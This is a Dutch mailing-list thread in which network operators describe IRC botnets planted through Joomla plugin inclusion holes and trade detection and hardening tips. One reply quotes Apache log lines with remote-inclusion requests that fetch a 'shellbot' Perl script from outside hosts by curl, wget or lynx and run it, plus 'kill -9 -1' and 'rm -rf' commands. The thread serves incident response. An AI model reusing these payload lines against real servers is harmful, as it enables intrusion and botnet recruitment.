Hoi, Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte dedicated server bij ons. Moet zeggen dat ik verrassend veel .nl machines tegen kom: http://www.proserve.nl/~peter/botnet6.txt Veel hosting toko's, dus vandaar dit mailtje. Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in de userinfo nog het beste beeld. Het is een flink netje, met ook flink wat power zo te zien. In iedergeval, deze ircd draait op 217.160.203.83 poort 23. Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd hoe het met de drones is afgelopen. Dit process viel op, en deze bleef ook draaien na een stop van apache. apache 23570 79.8 0.3 5108 3112 ? R 06:25 345:14 /usr/sbin/httpd Met een lsof was het duidelijk: perl 26331 apache 206u IPv4 15938897 TCP x.x.nl:55480->alb-server.de:telnet (SYN_SENT) Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is. Mochten mensen iets vinden, hoor ik het graag. Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden. -- /- Met vriendelijke groet/With kind regards, -\ <- Peter Batenburg - ProServe B.V. - www.proserve.nl -> \- tel: +31-78-6922222 - fax: +31-78-6922269 -/
Iets wat je veel terug ziet bij webservers met veel klanten en PHP, kijk voor de zekerheid ook even na of de apache user geen cronjob heeft, want vaak word de bot op die manier weer gestart mocht 'ie gekilled worden. Een aantal manieren om 't tegen te gaan: mod_security in apache laden fopen in php uitzetten (paardenmiddel, krijg je wel veel gezeur van klanten mee) suphp draaien, dan kun je zien onder welke user de bot/bouncer is gestart. Lelijk maar effectief, cronjob elke 5 minuten draaien (even aanpassen waar nodig): ps aux | grep apache | grep -v PHP | grep -v grep | awk '{print $2}' | xargs kill -9 > /dev/null 2> /dev/null Mochten er dan processen onder apache gestart worden dan worden ze iig direct weer afgeschoten. En vaak zijn de betreffende exploits niet zo heel moeilijk te vinden in je apache logs met wat zoekopdrachten als: grep .txt * | grep -v robots | grep -v 404 grep =http * | grep txt | grep -v 404 Dan komen er waarschijnlijk wel wat resultaten naar voren met pogingen tot hacks d.m.v. remote url exploits. Verder geeft 't zoeken naar bestanden op je filesystem met woorden als: 'bnc' 'psy' 'psybnc' 'udp.pl' ook wel aanwijzingen doordat je kunt zien waar de bots of IRC bouncers zijn neergezet. Ook de /tmp partitie op noexec,nosuid zetten in je fstab is raadzaam zodat er vanuit daar al niks kan worden uitgevoerd. At 14:22 19-5-2007, you wrote:
Hoi,
Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte dedicated server bij ons. Moet zeggen dat ik verrassend veel .nl machines tegen kom: http://www.proserve.nl/~peter/botnet6.txt Veel hosting toko's, dus vandaar dit mailtje. Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in de userinfo nog het beste beeld. Het is een flink netje, met ook flink wat power zo te zien. In iedergeval, deze ircd draait op 217.160.203.83 poort 23. Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd hoe het met de drones is afgelopen.
Dit process viel op, en deze bleef ook draaien na een stop van apache. apache 23570 79.8 0.3 5108 3112 ? R 06:25 345:14 /usr/sbin/httpd
Met een lsof was het duidelijk: perl 26331 apache 206u IPv4 15938897 TCP x.x.nl:55480->alb-server.de:telnet (SYN_SENT)
Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is. Mochten mensen iets vinden, hoor ik het graag.
Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden.
-- /- Met vriendelijke groet/With kind regards, -\ <- Peter Batenburg - ProServe B.V. - www.proserve.nl -> \- tel: +31-78-6922222 - fax: +31-78-6922269 -/ _______________________________________________ NLNOG mailing list NLNOG at nlnog.net http://mailman.nlnog.net/mailman/listinfo/nlnog
Met vriendelijke groet, Jeroen Wunnink, EasyHosting B.V. Systeembeheerder systeembeheer at easyhosting.nl telefoon:+31 (035) 6285455 Postbus 48 fax: +31 (035) 6838242 3755 ZG Eemnes http://www.easyhosting.nl http://www.easycolocate.nl
Lelijk maar effectief, cronjob elke 5 minuten draaien (even aanpassen waar nodig): ps aux | grep apache | grep -v PHP | grep -v grep | awk '{print $2}' | xargs kill -9 > /dev/null 2> /dev/null Mochten er dan processen onder apache gestart worden dan worden ze iig direct weer afgeschoten.
Mijn ervaring is dat je moet uitkijken met het zomaar killen van verdachte processen. Hoewel dat ook mijn eerste reactie zou zijn; heb ik wel eens meegemaakt bij het killen van 1 process, er een ander process het systeem nog verder om zeep hielp. Als ze echt volledig binnen zijn worden bestanden in /bin /sbin en /usr/bin en /usr/sbin vaak overschreven door trojanned versies. Dan ben je overigens aardig ver heen. Uitvoeren van lsof, netstat etc geeft dan helemaal niet de resultaten die je nodig hebt, vaak verbergen die gewoon de zaken die je juist wil zien of voeren doodleuk nog meer zooi uit dan dat er al draaide. Je zal dus eerst moeten checken of de cmd's die je wilt uitvoeren wel de originele zijn. Soms kun je dat zien aan de datum wanneer het bestand is gemaakt. Als je het echt zeker wilt weten moet je regelmatig md5 bestandjes maken en vervolgens bij zo'n hack controleren welke bestanden zijn gewijzigd. Ik heb wel eens zo'n systeem gefixt door simpelweg alle files in /bin /sbin /usr/bin en /usr/sbin uit een verse installatie te cp'en naar de bak vol trojans. Een volledige herinstallatie was denk ik sneller en verstandiger geweest trouwens.
On Mon, 21 May 2007, Alain Gotz (Shock Media) wrote:
al draaide. Je zal dus eerst moeten checken of de cmd's die je wilt uitvoeren wel de originele zijn. Soms kun je dat zien aan de datum wanneer het bestand is gemaakt. Als je het echt zeker wilt weten moet je regelmatig md5 bestandjes maken en vervolgens bij zo'n hack controleren welke bestanden zijn gewijzigd.
Of een moderne distributie gebruiken met een package manager? Op Redhat based systems: rpm -Va geeft bijna altijd de juiste info weer, zelfs na een hack, omdat hackers simpel niet de moeite nemen de rpm database te veranderen. (bovendien is die GPG signed)
Een volledige herinstallatie was denk ik sneller en verstandiger geweest trouwens.
Niet sneller, wel veiliger. Paul
On Mon, 21 May 2007, Jeroen Wunnink wrote:
Ook de /tmp partitie op noexec,nosuid zetten in je fstab is raadzaam zodat er vanuit daar al niks kan worden uitgevoerd.
Dat helpt niet. In de golf van Joomla exploits vorige week vroegen wij ons ook af waarom dat niet werkte. En toen realiserde ik het: /usr/bin/perl /tmp/foo/udp.pl Paul
Nou, het is echt feest deze week. Hier is de volgende lijst, alleen nu iets groter: http://www.proserve.nl/~peter/botnet7.txt Zelfde verhaal qua processes als vorige keer, alleen nu weten we ook via welk script de machines gehacked zijn. Zoek naar rs_gallery plugin van Joomla! Stuur deze lijst naar zo veel mogelijk mensen door, ik zie weer veel dezelfde hosts verschijnen helaas :( On Sat, 19 May 2007, ProServe - Peter Batenburg wrote:
Hoi,
Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte dedicated server bij ons. Moet zeggen dat ik verrassend veel .nl machines tegen kom: http://www.proserve.nl/~peter/botnet6.txt Veel hosting toko's, dus vandaar dit mailtje. Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in de userinfo nog het beste beeld. Het is een flink netje, met ook flink wat power zo te zien. In iedergeval, deze ircd draait op 217.160.203.83 poort 23. Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd hoe het met de drones is afgelopen.
Dit process viel op, en deze bleef ook draaien na een stop van apache. apache 23570 79.8 0.3 5108 3112 ? R 06:25 345:14 /usr/sbin/httpd
Met een lsof was het duidelijk: perl 26331 apache 206u IPv4 15938897 TCP x.x.nl:55480->alb-server.de:telnet (SYN_SENT)
Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is. Mochten mensen iets vinden, hoor ik het graag.
Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden.
-- /- Met vriendelijke groet/With kind regards, -\ <- Peter Batenburg - ProServe B.V. - www.proserve.nl -> \- tel: +31-78-6922222 - fax: +31-78-6922269 -/
Inmiddels weer wat meer info van een klant, het lijkt er op dat er meer modules worden misbruikt van Joomla!: 200.215.129.17 - - [22/May/2007:08:03:59 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=kill%20-9%20-1%00 HTTP/1.0" 200 8557 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:08:10:41 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;curl%20-o%20shellbot.txt%20http://www.fotospaya.com/.../shellbot.txt;perl%20shellbot.txt%00 HTTP/1.0" 200.215.129.17 - - [22/May/2007:08:15:15 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;wget%20http://www.fotospaya.com/.../shellbot.txt;perl%20shellbot.txt%00 HTTP/1.0" 200 7036 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:08:20:05 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=GET%20http://www.fotospaya.com/.../shellbot.txt|perl%00 HTTP/1.0" 200 7014 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:08:24:04 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=lynx%20-source%20www.fotospaya.com/.../shellbot.txt|perl%00 HTTP/1.0" 200 7016 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:04:02:07 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;curl%20-o%20shellbot.txt%20http://r3dlabel.googlepages.com/shellbot.txt;perl%20shellbot.txt%00 HTTP/1.0" 200 7016 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:04:08:02 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=rm%20-rf%20/tmp/*shell*%00 HTTP/1.0" 200 8575 "-" "DataCha0s/2.0" Doe er je voordeel mee. On Tue, 22 May 2007, ProServe - Peter Batenburg wrote:
Nou, het is echt feest deze week. Hier is de volgende lijst, alleen nu iets groter: http://www.proserve.nl/~peter/botnet7.txt Zelfde verhaal qua processes als vorige keer, alleen nu weten we ook via welk script de machines gehacked zijn. Zoek naar rs_gallery plugin van Joomla!
Stuur deze lijst naar zo veel mogelijk mensen door, ik zie weer veel dezelfde hosts verschijnen helaas :(
On Sat, 19 May 2007, ProServe - Peter Batenburg wrote:
Hoi,
Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte dedicated server bij ons. Moet zeggen dat ik verrassend veel .nl machines tegen kom: http://www.proserve.nl/~peter/botnet6.txt Veel hosting toko's, dus vandaar dit mailtje. Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in de userinfo nog het beste beeld. Het is een flink netje, met ook flink wat power zo te zien. In iedergeval, deze ircd draait op 217.160.203.83 poort 23. Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd hoe het met de drones is afgelopen.
Dit process viel op, en deze bleef ook draaien na een stop van apache. apache 23570 79.8 0.3 5108 3112 ? R 06:25 345:14 /usr/sbin/httpd
Met een lsof was het duidelijk: perl 26331 apache 206u IPv4 15938897 TCP x.x.nl:55480->alb-server.de:telnet (SYN_SENT)
Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is. Mochten mensen iets vinden, hoor ik het graag.
Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden.
-- /- Met vriendelijke groet/With kind regards, -\ <- Peter Batenburg - ProServe B.V. - www.proserve.nl -> \- tel: +31-78-6922222 - fax: +31-78-6922269 -/
De com_yanc plugin is bij een van mijn klanten ook gehacked geweest waar op een gegeven moment ook een zooi IRC connecties van af kwam. Regards, Vincent Bruijnes NLISP Internet -----Original Message----- From: nlnog-bounces at nlnog.net [mailto:nlnog-bounces@nlnog.net] On Behalf Of ProServe - Peter Batenburg Sent: dinsdag 22 mei 2007 9:04 To: nlnog at nlnog.net Subject: [Nlnog] (Nog een) Botnet Nou, het is echt feest deze week. Hier is de volgende lijst, alleen nu iets groter: http://www.proserve.nl/~peter/botnet7.txt Zelfde verhaal qua processes als vorige keer, alleen nu weten we ook via welk script de machines gehacked zijn. Zoek naar rs_gallery plugin van Joomla! Stuur deze lijst naar zo veel mogelijk mensen door, ik zie weer veel dezelfde hosts verschijnen helaas :( On Sat, 19 May 2007, ProServe - Peter Batenburg wrote:
Hoi,
Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte dedicated server bij ons. Moet zeggen dat ik verrassend veel .nl machines tegen kom: http://www.proserve.nl/~peter/botnet6.txt Veel hosting toko's, dus vandaar dit mailtje. Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in de userinfo nog het beste beeld. Het is een flink netje, met ook flink wat power zo te zien. In iedergeval, deze ircd draait op 217.160.203.83 poort 23. Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd hoe het met de drones is afgelopen.
Dit process viel op, en deze bleef ook draaien na een stop van apache. apache 23570 79.8 0.3 5108 3112 ? R 06:25 345:14 /usr/sbin/httpd
Met een lsof was het duidelijk: perl 26331 apache 206u IPv4 15938897 TCP x.x.nl:55480->alb-server.de:telnet (SYN_SENT)
Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is. Mochten mensen iets vinden, hoor ik het graag.
Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden.
-- /- Met vriendelijke groet/With kind regards, -\ <- Peter Batenburg - ProServe B.V. - www.proserve.nl -> \- tel: +31-78-6922222 - fax: +31-78-6922269 -/ _______________________________________________ NLNOG mailing list NLNOG at nlnog.net http://mailman.nlnog.net/mailman/listinfo/nlnog
participants (5)
-
Alain@shockmedia.nl -
jeroen@easyhosting.nl -
paul@xtdnet.nl -
peter@proserve.nl -
vincent@nlisp.nl